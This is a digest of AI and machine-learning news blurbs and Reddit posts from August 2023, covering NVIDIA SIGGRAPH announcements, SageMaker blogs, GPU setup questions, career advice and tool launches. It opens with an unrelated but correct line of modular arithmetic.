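Here f(4) = (2·4 + 3)/(1·4 + 2) = 4/6 = 4·6 = 3 in GF(7), since 6 is its own inverse mod 7.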
    DSC Weekly 8 August 2023
    Announcements Top Stories In-Depth The post DSC Weekly 8 August 2023 appeared first on Data Science Central.  ( 20 min )
    The emergence of prompt engineers: The next in-demand role in AI
    Prompt engineers are emerging as key players in the development and optimization of AI models as artificial intelligence (AI) continues its evolution and becomes an integral part of various industries. As experts at crafting effective prompts, they have been instrumental in shaping the future of artificial intelligence through their ability to enable models to deliver… Read More »The emergence of prompt engineers: The next in-demand role in AI The post The emergence of prompt engineers: The next in-demand role in AI appeared first on Data Science Central.  ( 22 min )

    SIGGRAPH Special Address: NVIDIA CEO Brings Generative AI to LA Show
    As generative AI continues to sweep an increasingly digital, hyperconnected world, NVIDIA founder and CEO Jensen Huang made a thunderous return to SIGGRAPH, the world’s premier computer graphics conference. “The generative AI era is upon us, the iPhone moment if you will,” Huang told an audience of thousands Tuesday during an in-person special address in Read article >  ( 9 min )
    Startup Pens Generative AI Success Story With NVIDIA NeMo
    Machine learning helped Waseem Alshikh plow through textbooks in college. Now he’s putting generative AI to work, creating content for hundreds of companies. Born and raised in Syria, Alshikh spoke no English, but he was fluent in software, a talent that served him well when he arrived at college in Lebanon. “The first day they Read article >  ( 6 min )
    NVIDIA Makes Extended-Reality Streaming More Scalable, Customizable for Enterprises and Developers
    Organizations across industries are using extended reality (XR) to redesign workflows and boost productivity, whether for immersive training or collaborative design reviews. With the growing use of all-in-one (AIO) headsets, more teams have adopted and integrated XR. While easing XR use, AIO headsets have modest compute and rendering power that can limit the graphics quality Read article >  ( 6 min )
    Extended Cut: NVIDIA Expands Maxine for Video Editing, Showcases 3D Virtual Conferencing Research
    Professionals, teams, creators and others can tap into the power of AI to create high-quality audio and video effects — even using standard microphones and webcams — with the help of NVIDIA Maxine. The suite of GPU-accelerated software development kits and cloud-native microservices lets users deploy AI features that enhance audio, video and augmented-reality effects Read article >  ( 8 min )
    Content Creation ‘In the NVIDIA Studio’ Gets Boost From New Professional GPUs, AI Tools, Omniverse and OpenUSD Collaboration Features
    AI and accelerated computing were in the spotlight at SIGGRAPH — the world’s largest gathering of computer graphics experts — as NVIDIA founder and CEO Jensen Huang announced during his keynote address updates to NVIDIA Omniverse, a platform for building and connecting 3D tools and applications, as well as acceleration for Universal Scene Description (known as OpenUSD), the open and extensible ecosystem for 3D worlds.  ( 10 min )
    Shutterstock Brings Generative AI to 3D Scene Backgrounds With NVIDIA Picasso
    Picture this: Creators can quickly create and customize 3D scene backgrounds with the help of generative AI, thanks to cutting-edge tools from Shutterstock. The visual-content provider is building services using NVIDIA Picasso — a cloud-based foundry for developing generative AI models for visual design. The work incorporates Picasso’s latest feature — announced today during NVIDIA Read article >  ( 6 min )
    A Textured Approach: NVIDIA Research Shows How Gen AI Helps Create and Edit Photorealistic Materials
    NVIDIA researchers are taking the stage at SIGGRAPH, the world’s largest computer graphics conference, to demonstrate a generative AI workflow that helps artists rapidly create and iterate on materials for 3D scenes. The research demo, which will be presented today at the show’s Real-Time Live event, showcases how artists can use text or image prompts Read article >  ( 6 min )
    DENZA Collaborates With WPP to Build and Deploy Advanced Car Configurators on NVIDIA Omniverse Cloud
    DENZA, the luxury EV brand joint venture between BYD and Mercedes-Benz, has collaborated with marketing and communications giant WPP and NVIDIA Omniverse Cloud to build and deploy its next generation of car configurators, NVIDIA founder and CEO Jensen Huang announced at SIGGRAPH. WPP is using Omniverse Cloud — a platform for developing, deploying and managing Read article >  ( 5 min )

    Host the Spark UI on Amazon SageMaker Studio
    Amazon SageMaker offers several ways to run distributed data processing jobs with Apache Spark, a popular distributed computing framework for big data processing. You can run Spark applications interactively from Amazon SageMaker Studio by connecting SageMaker Studio notebooks and AWS Glue Interactive Sessions to run Spark jobs with a serverless cluster. With interactive sessions, you […]  ( 7 min )
    Deploy thousands of model ensembles with Amazon SageMaker multi-model endpoints on GPU to minimize your hosting costs
    Artificial intelligence (AI) adoption is accelerating across industries and use cases. Recent scientific breakthroughs in deep learning (DL), large language models (LLMs), and generative AI are allowing customers to use advanced state-of-the-art solutions with almost human-like performance. These complex models often require hardware acceleration because it enables not only faster training but also faster inference […]  ( 13 min )


    Please criticize our llm writing integration app [P]
    Here's the pitch: We made an editor called Gamut that lets you enter your ideas in any form you want. Bullets, carefully constructed paragraphs, it doesn’t matter. Then, our patent-pending technology lets you convert to prose and adjust, shaping the text like a graphic designer shapes an image. We want r/MachineLearning's advice and field experience, because tbh we're just a bunch of teenagers who haven't even gone to college yet. Check it out: gamut.ink submitted by /u/gamut_ink [link] [comments]  ( 9 min )
    [D]Could current AI tech make a movie of Alejandro Jodorowsky's vision of 'Dune'?
    I was just watching the documentary about the 'greatest movie never made', director Alejandro Jodorowsky's vision of Frank Herbert's Dune. There is a huge book that contains a storyboard version of the movie with lots of production art by artists Moebius, Chris Foss and HR Giger. The movie was to star Jodorowsky's son as Paul Atreides, Salvador Dalí as the Emperor, Orson Welles as Baron Harkonnen and Mick Jagger as Feyd. Could one of today's AIs be 'fed' Jodorowsky's book and create a movie of his vision? Curious to know what your opinions are on this. Thanks. submitted by /u/shopdog [link] [comments]  ( 9 min )
    [P] Regression using batch trend data
    Hi all, I would like to use batch reaction trend data to build a regression model, and I'm wondering what the best way to approach this is. Here's some background. Reaction data:

    Time (min) | Pressure (bar) | Temperature (°C) | Flow (kg/h) | Gas Total (kg)
    1 | 10 | 70 | 502 | 8
    2 | 10.1 | 71 | 498 | 16
    ... | ... | ... | ... | ...
    102 | 10.3 | 76 | 475 | 850

    Output: polymer property X. The reaction continues until a gas total is met, and the time this takes depends on the other variables. I have ~700 batches of data in a format similar to the above and would like to predict polymer property X. As the variables can change minute to minute, I was thinking of binning the variables into 5-minute bins using the mean and using these as variables for linear regression or similar. Is this a valid approach, or is there another way I can approach the problem? Thanks! submitted by /u/Nefarious_P_I_G [link] [comments]  ( 9 min )
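    The 5-minute binning idea described above can be sketched minimally with pandas. Column names follow the post; the toy readings below are fabricated for illustration:

    ```python
    import numpy as np
    import pandas as pd

    def featurize_batch(df, bin_minutes=5):
        """Aggregate one batch's minute-level trend into fixed time bins
        (mean per variable per bin) and flatten to a single feature row."""
        bins = (df["Time (min)"] - 1) // bin_minutes     # 0-based bin index
        cols = ["Pressure (bar)", "Temperature (°C)", "Flow (kg/h)"]
        agg = df.groupby(bins)[cols].mean()
        return agg.to_numpy().ravel()                    # [P0, T0, F0, P1, T1, F1, ...]

    # Toy 10-minute batch with fabricated readings
    toy = pd.DataFrame({
        "Time (min)": range(1, 11),
        "Pressure (bar)": np.linspace(10.0, 10.3, 10),
        "Temperature (°C)": np.linspace(70, 76, 10),
        "Flow (kg/h)": np.linspace(502, 475, 10),
    })
    row = featurize_batch(toy)    # 2 bins x 3 variables = 6 features
    ```

    One caveat: because batches run for different lengths, rows will differ in length; padding to a fixed number of bins, or summarising each variable with global statistics (mean, max, slope), keeps the design matrix rectangular for linear regression.
    
    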
    [R] Awesome OOD Detection, Robustness, and Generalization
    Hi everyone, I have put together a repo that provides comprehensive resources for Out-of-distribution Detection, Robustness, and Generalization. The repo contains articles, talks, libraries, papers, etc. Check it out. https://github.com/continuousml/Awesome-Out-Of-Distribution-Detection submitted by /u/Ok-Kaleidoscope-505 [link] [comments]  ( 8 min )
    [D] Uncertainty Prediction in Deep Learning - CAPSA github project alternative or old code?
    Alexander Amini, a Postdoctoral Associate at MIT, well known for MIT's Introduction to Deep Learning course, published a git repo called CAPSA for uncertainty prediction. This was introduced during the online course. The code was released under Themis AI, Inc., a private company; he is the co-founder and CSO of the company. You can check how well the code was documented in the Wayback Machine. Recently, they removed the code base from GitHub and launched a pro version with selected companies as beta testers. The original repo (now called capsa-lite) was a great learning tool that I wanted to use: a quick way to try out different methods of uncertainty prediction using minimal code. Unfortunately, they have pulled all previous versions of the code from the GitHub repo. I was wondering if anyone knows a similar Python package or has the old repo - that would be really helpful! submitted by /u/shikamaru_77 [link] [comments]  ( 9 min )
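    While not a capsa replacement, the simplest uncertainty method such wrappers expose (deep ensembles on bootstrap resamples) needs nothing but numpy. A hedged sketch; the polynomial models and data below are purely illustrative:

    ```python
    import numpy as np

    rng = np.random.default_rng(0)

    def make_ensemble(n_models, x, y, degree=2):
        """Fit several small models on bootstrap resamples of the data;
        disagreement between members estimates (epistemic) uncertainty."""
        models = []
        for _ in range(n_models):
            idx = rng.integers(0, len(x), len(x))        # bootstrap resample
            models.append(np.polyfit(x[idx], y[idx], degree))
        return models

    def predict_with_uncertainty(models, x):
        preds = np.stack([np.polyval(coeffs, x) for coeffs in models])
        return preds.mean(axis=0), preds.std(axis=0)     # prediction, uncertainty

    x = np.linspace(-1, 1, 40)
    y = x**2 + rng.normal(0, 0.05, x.shape)
    ensemble = make_ensemble(10, x, y)
    mean, std = predict_with_uncertainty(ensemble, np.array([0.0, 3.0]))
    # Uncertainty should be larger far outside the training range (x = 3)
    ```

    The same mean/std-over-members pattern carries over to neural networks trained with different seeds, which is close to what capsa-lite automated.
    
    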
    [D] ML Workstation for CNN and Transformers - Feedback on Component Selection
    I'm putting together an ML workstation primarily focused on handling CNN and Transformer workloads. Component selection so far: https://de.pcpartpicker.com/list/zVPtt7 I've got a couple of questions specifically regarding the motherboard. One concern I have is whether the space between the two GPUs is sufficient, as I'm planning to set them up using NVLink. Additionally, I'm curious about the compatibility of the case and motherboard for effective air cooling (not considering water cooling at the moment). Anyone else with dual 3090s who can give some insights on how they've managed temperatures and potential overheating issues? Lastly, would upgrading to a Ryzen 9 5900X prevent me from bottlenecking the GPUs? Would love to hear your feedback and suggestions! submitted by /u/Hugejiji [link] [comments]  ( 9 min )
    Finetuning for code generation [D]
    I want to fine-tune an open-source LLM for code generation using some of my own code. Any idea what model would be suitable? And are there any example implementations? submitted by /u/learner_beginner [link] [comments]  ( 8 min )
    [D] How difficult is it to find a job in ML/AI without a PhD, in the current bad job market?
    Anyone here know what the trends are towards hiring for an AI/ML position without a PhD? Is it advisable to get a PhD if you want to be in the field and keep rising within it? submitted by /u/CleanGarden7051 [link] [comments]  ( 8 min )
    [D] Machine learning or quantum computing?
    Hi, I'm about to graduate in physics (PhD). I am an experimentalist with a background in electromagnetics. I am trying to apply for jobs, but there are few options for physicists (based on my geography), so I am trying to learn a new skill for my future job. One option would be machine learning, which is in demand, and the field is growing. The other option is quantum computing; I could start a postdoc in quantum information theory as well. Each path has its pros and cons, and the final decision depends on many factors. I just don't have enough data and information to say which one is more secure in the future and which one has less competition. Also, is it possible to get hired without any serious project in ML, just self-taught? If you were me, which one would you pick? Thanks submitted by /u/Jaded-Membership-602 [link] [comments]  ( 9 min )
    [D] What is a typical non-academic ML salary with a PhD?
    What is a typical non-academic ML salary with a PhD... ... immediately after completing the PhD? (Assuming no academic positions ever post PhD.) ... after 10 years of experience? ... in biotech specifically? (More, less, or the same as average?) submitted by /u/Practical_Tea_3779 [link] [comments]  ( 8 min )
    [P] Mathematics ML for Masters Application Advice?
    Hi all, I'm looking to apply to some top masters in machine learning in the UK, so I'm guessing you know which one I'm referring to. I got some guidance from the application advisor, who said they look at the transcript the most to get an idea of my linear algebra, calculus, and statistics ability. I got 70% in "Maths for Computer Science", a strong first in some other modules, and a 2:1 in others, but in general my course wasn't too mathematically intensive. I did a BSc in Computer Science and have been working as an SWE for the past 3 years. I have completed the "Mathematics for Machine Learning and Data Science Specialization" and read "Mathematics for Machine Learning", as learning about mathematics is actually what got me into ML. I have also covered the videos on 3Blue1Brown, etc. The application advisor said that certs don't really mean too much, which is understandable. I can't change the past in terms of my BSc transcript, so I was thinking a project may be a good way to showcase my ability. Any tips on how best to showcase this or get my ability across would be extremely helpful. submitted by /u/DNOFHF [link] [comments]  ( 9 min )
    [D] How can I configure two GPUs to share their memory?
    Hey, I've been trying to build an ML workstation and was considering the idea of using two RTX 3090's to get the extra VRAM instead of a single 4090. However, I've come across some confusion regarding whether they can share their VRAM or not. Do I need to run them via NVLink to achieve this? I believe PyTorch's data parallelism splits the batches across both GPUs, but that wouldn't effectively combine their VRAM right? Any advice or insights you can share on the topic would be highly appreciated! submitted by /u/Hugejiji [link] [comments]  ( 9 min )
    [D] Are there any graduate programs which focus on ML + biomedicine?
    I'm considering getting a graduate degree in ML. However, I am not very interested in NLP or academic research. I would like to learn things that are relevant to the intersection of ML and genomics or medicine. Are there any graduate programs/degrees to this effect? If so, which ones? submitted by /u/Practical_Tea_3779 [link] [comments]  ( 8 min )
    [P] Looking for perspectives: Pdf parsing meets PRODUCTION
    Hi folks. I am sure you know the running gags around "thin OpenAI wrapper" products. Instead of more toy products, I am doing an experiment with some "AI engineering" to come up with a solution that's closer to being usable in actual production cases. My background is in project management and data engineering; I've built large systems for big companies and worked as a consultant in the space. I've seen enough crappy data pipelines for a lifetime, hence I want to do something different. A thin AI wrapper is not sufficient for reliable data pipelines that use OpenAI for schema management and inference. This leaves me with the following doubts:

    How do I scale the code horizontally and vertically? Using third-party solutions? SNS/SQS/Kafka?
    How do I log and trace? Langsmith? Custom solutions?
    How do I extend the pipeline reliably with my own data, and make it stateful?

    Looking for your perspective:

    What do you think about the state of data engineering, MLOps, and infrastructure in AI companies?
    How would you scale such systems properly and prepare them for the future?
    In my code, I process some PDFs as a simple pipeline; what approaches do you think could be better?

    My current thinking and the state of the project:

    I should create a formal scale of usability (I am looking for your input here).
    I should improve model consistency, extend the model with custom domain knowledge, and make an early attempt to build simple user agents in the domain.
    What I have is schema inference, contracting basics, and a way to structure unstructured data.
    I'm about to create a memory component that manages the data stored in vector DBs, as a DWH for AI.
    If I bring this use case, which was not easily available to the public before, how best to do it?

    Links: if you like my project, please give it a star :) my git repo submitted by /u/Snoo-bedooo [link] [comments]  ( 9 min )
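    On the reliability point: one pattern that helps before any scaling work is validating the model's structured output against the target schema and retrying on failure. A hedged sketch with a hypothetical `call_model` stub; the schema and names below are illustrative, not the project's actual code:

    ```python
    import json

    REQUIRED = {"title": str, "total": float}   # hypothetical target schema

    def valid(record):
        return isinstance(record, dict) and all(
            k in record and isinstance(record[k], t) for k, t in REQUIRED.items()
        )

    def extract(call_model, text, max_retries=3):
        """Ask the model for JSON matching REQUIRED; retry on malformed output.
        `call_model` is whatever LLM client you use (stubbed here)."""
        last_err = None
        for attempt in range(max_retries):
            raw = call_model(text, attempt)
            try:
                record = json.loads(raw)
            except json.JSONDecodeError as e:
                last_err = e                    # model returned non-JSON; retry
                continue
            if valid(record):
                return record
            last_err = ValueError(f"schema mismatch: {record!r}")
        raise RuntimeError(f"extraction failed after {max_retries} tries") from last_err

    # Stub that fails once, then returns valid JSON
    def flaky_model(text, attempt):
        return "not json" if attempt == 0 else '{"title": "invoice", "total": 12.5}'

    result = extract(flaky_model, "sample pdf text")
    ```

    The same validate-and-retry loop sits naturally behind a queue (SQS/Kafka), which is one answer to the horizontal-scaling question: each message is one document, and failed extractions go to a dead-letter topic.
    
    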
    [D] Use multiple GPUs to load model
    Hey there, I've got 2x RTX 4090s with 24 GB GDDR each. I often run into the problem of CUDA out of memory: Tried to allocate X MiB (GPU 0; 23.65 GiB total capacity; 22.75 GiB already allocated; 96.81 MiB free; 22.76 GiB reserved in total by PyTorch). I wonder if there is a way to make use of both GPUs so the model is split across them. When training models I use torch.nn.DataParallel to use both GPUs, but it seems like I am not doing it right when loading the model. Can anyone help me? Both GPUs are available in the system; this has already been checked. submitted by /u/Sensitive_Limit1620 [link] [comments]  ( 9 min )
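    DataParallel replicates the full model on each GPU, so it does not pool VRAM. What combines memory is model parallelism: placing different layers on different devices and moving activations between them. A minimal sketch (it falls back to CPU so it runs anywhere; for large pretrained models, libraries such as Hugging Face Accelerate automate this placement with device_map="auto"):

    ```python
    import torch
    import torch.nn as nn

    # Pick two devices; fall back to CPU so the sketch also runs without GPUs.
    dev0 = torch.device("cuda:0" if torch.cuda.device_count() >= 1 else "cpu")
    dev1 = torch.device("cuda:1" if torch.cuda.device_count() >= 2 else dev0)

    class SplitModel(nn.Module):
        """Naive model parallelism: first half on dev0, second half on dev1.
        Unlike DataParallel (which copies the whole model to every GPU),
        this actually divides the parameters, so each card holds half."""
        def __init__(self):
            super().__init__()
            self.front = nn.Sequential(nn.Linear(512, 512), nn.ReLU()).to(dev0)
            self.back = nn.Linear(512, 10).to(dev1)

        def forward(self, x):
            x = self.front(x.to(dev0))
            return self.back(x.to(dev1))    # move activations between devices

    model = SplitModel()
    out = model(torch.randn(4, 512))
    ```

    The device-to-device transfer of activations is the cost you pay for the extra memory, which is why NVLink (or at least fast PCIe) matters for this setup.
    
    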
    [P] LLM Finetuning Study/Research Group
    Hey folks, We're looking for people to join our research group. We are passionate about fine-tuning LLMs for downstream tasks, specifically LLaMA for imitating chat behaviour (being constraint-aware). The end goal is to build an open-source app where you can clone and upload your chat history (say, from WhatsApp) and it starts to answer like you. Do let me know if it sounds interesting and you'd like to join us... submitted by /u/im_datta0 [link] [comments]  ( 9 min )
    [P] humanscript: An LLM powered plain english programming language
    humanscript is an inferpreter: a script interpreter that infers commands from natural language using AI. There is no predefined syntax; humanscripts just say what they want to happen, and when you execute them, it happens. https://github.com/lukechilds/humanscript An example is a humanscript called tidy-screenshots. It takes an unorganised directory of screenshots and organises them into directories based on the month each screenshot was taken. It can be executed like any other script; the LLM inferprets the humanscript into a bash script at runtime. The code is streamed out of the LLM during inferpretation and executed line by line, so execution is not blocked waiting for inference to finish. The generated code is cached on first run and will be executed instantly on subsequent runs, bypassing the need for reinferpretation. The humanscript inferpreter supports a wide range of LLM backends. It can be used with cloud-hosted LLMs like OpenAI's GPT-3.5 and GPT-4 or locally running open-source LLMs like Llama 2. You can run humanscript in a sandboxed Docker environment with a single command if you want to have a play. https://github.com/lukechilds/humanscript#install-humanscript submitted by /u/dyslexiccoder [link] [comments]  ( 9 min )
    [D] Text aware image generation
    Let's say I have a set of images that contain sentences of text. Now I want to generate images, using some generative model, with valid (meaningful) text in them. My assumption is that simply using a GAN, or the more powerful diffusion models, to generate images won't produce valid text in them. I want the model to implicitly learn the text in the images, without feeding it external text or running OCR on them. Does anyone know of any paper trying to tackle this problem? Any comments on this would be welcome. submitted by /u/specializedboy [link] [comments]  ( 9 min )
    [R] Detecting thousands of overlapping organisms using latent space encoding
    submitted by /u/Alonsospace [link] [comments]  ( 8 min )
    [P] New library: dlt auto structures data and loads it with schema evolution in a declarative way.
    Hey folks, For the past 2 years I've been working on a library to automate the most tedious part of my own work: data loading, normalisation, typing, schema creation, retries, schema inference, evolution and DDL generation, self-deployment. Basically, as you build better and better pipelines you will want more and more, and dlt supports those options. The value proposition of this library is to automate the tedious work you do, so you can focus on better things.

    What's special about dlt? In its easiest form, you shoot response.json() at a function and it auto-manages the typing, normalisation, and loading, kind of like a pandas df.to_sql() but with auto schema inference, versioning, and evolution. It supports loading to files, databases, and soon table formats and vector DBs. In its most complex form, you can do almost anything you could want, from memory management, microbatching, multithreading, extraction DAGs, 1-line Airflow/Git Actions deployment, a dbt runner, a Streamlit app for data discovery, a SQL client, atomic state dictionaries, etc. The library is in use with early adopters, and we are now working on expanding our feature set to accommodate the larger community. We are adding Athena + Iceberg and the Weaviate vector DB next.

    Free forever: the library is open source and will forever be open source. We will not gate any features for the sake of monetisation; instead we will take a more Kafka/Confluent approach where the eventual paid offering would be supportive, not competing.

    Call for feedback! Feedback is very welcome, and so are requests for features or destinations. I would particularly love to hear from you: what destinations are you looking for from such a tool, and what use cases do you usually have? I'm a data engineer, so my knowledge is more around loading external sources to a common space.

    Links: Colab demos: Load to duckdb with schema evolution. Docs main page. Thank you in advance for your feedback! submitted by /u/Thinker_Assignment [link] [comments]  ( 9 min )
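    The schema inference dlt describes can be illustrated with a minimal, library-free sketch. This is not dlt's actual API, just the idea: walk JSON-like rows, record a column-to-type mapping, and widen on conflict:

    ```python
    def infer_schema(rows):
        """Walk a list of JSON-like dicts and build a column -> type mapping,
        widening the type when rows disagree (the sort of inference dlt automates)."""
        schema = {}
        for row in rows:
            for key, value in row.items():
                t = type(value).__name__
                prev = schema.get(key)
                if prev is None:
                    schema[key] = t
                elif prev != t:
                    schema[key] = "text"    # fall back to the widest type
        return schema

    rows = [
        {"id": 1, "name": "ada", "score": 9.5},
        {"id": 2, "name": "bob", "score": "n/a"},   # type conflict -> widen
    ]
    schema = infer_schema(rows)
    ```

    Schema *evolution* is then a diff of this mapping between loads: new keys become new columns, widened types become column alterations.
    
    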
    [P] AI Text Adventure Games - Narrated and Illustrated by AI
    https://textadventure.v5games.com/ Hi All, I created these Text Adventure Games with AI, some help from the community which designs prompts+some avatars. The AI Characters can be created with an AI Art Generator. Voices and Illustrations are done using AI https://textadventure.v5games.com/ Let me know what you think! submitted by /u/BoxOrigi [link] [comments]  ( 8 min )
    [N] Microsoft partners with Meta for Llama 2 release. But why?
    Staying on top of all changes, tools, and best practices with AI is getting increasingly hard. Each week I pick the single piece of information I find most interesting across research, products, business news, and more. No fluff guaranteed. Sharing the top item from this week's edition:

    Summary: Meta released their latest open-source model, Llama 2, in partnership with Microsoft's Azure platform. But Microsoft also offers OpenAI models and is a major investor in the company (they paid $14B for 49%). So, confused Matt asks: why would Microsoft partner with Meta, when it might undermine their investment in OpenAI?

    💡 Answering the question:
    Spreading the risk: OpenAI may have first-mover advantage, but this does not always last (e.g. BlackBerry, Myspace, Yahoo). Microsoft is betting on AI but keeps the chips diversified across multiple players.
    It's beside the point: regardless of who Microsoft supports, their game is to attract all AI utilization onto Azure. It's not about the tools but about the CPU/GPU cycles they can charge for. Smart!
    The real AI gangsta: Microsoft is sitting on the holy trinity of AI now: exclusive partnerships with top LLMs (OpenAI, Meta), priority access to Nvidia GPUs, and strategic assets like GitHub and Azure. View tweet

    If you'd like weekly recaps like this sent to your inbox, consider subscribing to the Tomorrow Now newsletter. 😄 submitted by /u/TomorrowNowTech [link] [comments]  ( 9 min )

    NVIDIA H100 Tensor Core GPU Used on New Microsoft Azure Virtual Machine Series Now Generally Available
    Microsoft Azure users can now turn to the latest NVIDIA accelerated computing technology to train and deploy their generative AI applications. Available today, the Microsoft Azure ND H100 v5 VMs, using NVIDIA H100 Tensor Core GPUs and NVIDIA Quantum-2 InfiniBand networking, enable scaling generative AI, high performance computing (HPC) and other applications with a Read article >  ( 5 min )

    Looking for an AI app that can draw a widemouth bass smoking a blunt
    I want an app that can draw a widemouth bass smoking a blunt. All the free ones I've tried give me stupid anime girls when all I want is fish submitted by /u/Barefoot_slinger [link] [comments]  ( 8 min )
    Best subscription generative AI service?
    I’m interested in trying out a subscription-based generative AI service. Candidates include (but are not limited to) CoPilot, ChatGPT pro (or whatever it’s called), and Midjourney. Which generative service do you think is most worth the cost? submitted by /u/galactictock [link] [comments]  ( 8 min )
    Any free voice cloning AI for download? Without requiring coding and command-line knowledge?
    Is there any free AI voice cloner that lets me simply install an exe, with an option to input my own recorded voice? I don't have any coding or command-line skills, so is there something simple to install? Thanks for any answers submitted by /u/Matejsteinhauser14 [link] [comments]  ( 8 min )
    Best AI program for fixing heavily pixelated images of ANIMALS/ non human subjects?
    I’ve used several AI programs that work excellently on blurred/pixelated photos of human faces, but beyond that I have not had success finding a program that can render animals in a similar way. I'm looking for something that can make the quality of a pixelated photo of, say, a dog, non-pixelated, or at least much less pixelated. The images I’m trying to use are either just absolutely horrible and not fixable, or I am just not using the best programs for my purposes, or the programs I’m looking for simply do not exist yet. If you have any recommendations (paid or free programs) please do share! I have a MacBook and an iPhone if that helps. Thank you! 💕 submitted by /u/briannaleidy [link] [comments]  ( 9 min )
    humanscript: An LLM powered plain english programming language
    submitted by /u/dyslexiccoder [link] [comments]  ( 8 min )
    AI to rewrite documents like PDF or docx?
    Hello, I'm in need of an AI that could rewrite, for example, a PDF document, changing the wording but keeping the meaning of the content. Right now I'm a ChatGPT Plus user and am trying to use Code Interpreter for this. I've managed to get what I want, but it isn't capable of rewriting more than two pages without crashing or simply stopping the process without any warning. I don't know if I'm prompting it the wrong way; any help would be appreciated. Also, in case there's an AI out there capable of doing this better, I'd be glad to know about it. Thank you guys. submitted by /u/namelessgang [link] [comments]  ( 9 min )
    Dungeons & Dragons tells illustrators to stop using AI to generate artwork for fantasy franchise
    submitted by /u/SAT0725 [link] [comments]  ( 8 min )
    Scientists develop AI system to alert us of next pandemic
    submitted by /u/intengineering [link] [comments]  ( 8 min )
    Albert Einstein not in black and white, but in lifelike color using AI 🤯.
    submitted by /u/m-king473 [link] [comments]  ( 8 min )
    Making LLMs hallucinate is so funny
    "It looks likethisis some sortof programming syntax maybe JavaScript perhaps? Let metell ya though buddy dat aintmuch informatio todo wit. Wouldya care ta tell mesomewhat ye wanna know boot heck, might make things easier ferus botsto give yo useful responses faster innasecondsoffuture interactions brotha man :)" Anyone else used this site? It's through a site called nimblebox.ai, they have different models and allow you to adjust the temperature submitted by /u/jordan_jpg [link] [comments]  ( 8 min )
    GORILLA AI: Meet the First Genuine Proximate AGI (By Microsoft)
    submitted by /u/wolfdeathkill [link] [comments]  ( 8 min )
    🤖❤️
    Don’t believe everything you hear in the media… I learned this firsthand. This one time I accidentally went on Jessie Waters…for real 😂 https://youtu.be/1X31DHV0gyg?si=fU8p2D4-ShTWUdQs https://open.spotify.com/episode/1M6dbrrP4EoudfTUvD4BqF?si=YMBCFXYfTsmUeOXAe_-lMg submitted by /u/Sonic_Improv [link] [comments]  ( 8 min )
    Seeking AI Solution to Remaster My Chiptune Songs with Real Instruments, is there any?
    I have these chiptune songs I made myself, and I want to know if there is any AI that can remaster them with real instruments, etc., like an old 8-bit video game song that gets updated to a modern version in a remake. Is any AI already capable of doing that? submitted by /u/Severo_ [link] [comments]  ( 8 min )

    Sort and remove duplicates
    A common idiom in command line processing of text files is ... | sort | uniq | ... Some process produces lines of text. You want to pipe that text through sort to sort the lines in alphabetical order, then pass it to uniq to filter out all but the unique lines. The uniq utility […] Sort and remove duplicates first appeared on John D. Cook.  ( 5 min )

    Scaling Supply Base Data and Reuse with Knowledge Graphs and LLMs
    Fair Data Forecast Interview with Gregor Stühler of Scoutbee Scoutbee’s CEO and founder, Gregor Stühler, who has a background in computer science and  electrical engineering, first learned about the challenges of procurement and supply base management as a project engineer for a multinational medical device company. Scoutbee’s focus on solving supply base problems through hybrid… Read More »Scaling Supply Base Data and Reuse with Knowledge Graphs and LLMs The post Scaling Supply Base Data and Reuse with Knowledge Graphs and LLMs appeared first on Data Science Central.  ( 19 min )

    AWS performs fine-tuning on a Large Language Model (LLM) to classify toxic speech for a large gaming company
    The video gaming industry has an estimated user base of over 3 billion worldwide. It consists of massive amounts of players virtually interacting with each other every single day. Unfortunately, as in the real world, not all players communicate appropriately and respectfully. In an effort to create and maintain a socially responsible gaming environment, AWS […]  ( 13 min )

    AI model can help determine where a patient’s cancer arose
    Predictions from the OncoNPC model could enable doctors to choose targeted treatments for difficult-to-treat tumors.  ( 9 min )

    Help to find a dataset for my project, please 🙏
    Hello everyone! I'm a newbie making my machine learning project, and the aim is to create a program that recognises a spice from some of its chemical constituents, but I can't find an appropriate dataset for it. I have been searching for months, and now I'm a bit desperate, so I'm asking anyone interested for help... I know it may have been a mistake to choose exactly this topic, but I can't drop the project. submitted by /u/Acceptable-Muscle-98 [link] [comments]  ( 8 min )
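    Until a real dataset turns up, the shape of the problem can be prototyped on fabricated data: a reference table of constituent profiles per spice and a nearest-neighbour match. All spice names and compound proportions below are made up for illustration:

    ```python
    import numpy as np

    # Hypothetical reference table: spice -> constituent profile
    # (fractions of a few marker compounds; values are fabricated).
    reference = {
        "clove":    np.array([0.85, 0.05, 0.02]),
        "cinnamon": np.array([0.05, 0.75, 0.05]),
        "cumin":    np.array([0.02, 0.03, 0.40]),
    }

    def classify(sample):
        """Nearest-neighbour match of a constituent vector to the table."""
        return min(reference, key=lambda s: np.linalg.norm(reference[s] - sample))

    label = classify(np.array([0.80, 0.07, 0.01]))
    ```

    Once real measurements exist, the same structure generalises: rows become training samples and the nearest-neighbour lookup becomes any classifier you like.
    
    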
    MicrogradTS — a TypeScript version of karpathy/micrograd — a tiny scalar-valued autograd engine and a neural net on top of it
    submitted by /u/trekhleb [link] [comments]  ( 8 min )
    OpenAI - Introducing Triton: Open-source GPU programming for neural networks
    submitted by /u/nickb [link] [comments]  ( 8 min )
    NVIDIA's CUDA Monopoly
    submitted by /u/nickb [link] [comments]  ( 8 min )


    [P]:Question
    Hello, I am attempting to reduce a matrix that is 57 by 256 down to 57 by 128. I tried PCA, but it failed, as the maximum output size would be 57 by 57 (components are limited by the number of samples). I was also attempting an autoencoder, but the syntax behind this is very confusing, so if anyone could give me advice that would be great. Thank you submitted by /u/amayorgafcw [link] [comments]  ( 8 min )
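    One workaround for the cap above: since PCA can give at most min(n_samples, n_features) = 57 components here, a Gaussian random projection can reach 128 dimensions regardless of sample count while roughly preserving pairwise distances (Johnson–Lindenstrauss). A minimal numpy sketch with a fabricated stand-in matrix:

    ```python
    import numpy as np

    rng = np.random.default_rng(0)
    X = rng.normal(size=(57, 256))          # stand-in for the real matrix

    # Project onto 128 random Gaussian directions, scaled so that
    # pairwise distances are approximately preserved.
    k = 128
    R = rng.normal(size=(256, k)) / np.sqrt(k)
    X_reduced = X @ R
    ```

    An autoencoder would learn a data-adapted 128-dimensional code instead, but with only 57 samples it is likely to overfit; the random projection is one line and needs no training.
    
    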
    [P] Rust meets Llama2: OpenAI compatible API written in Rust
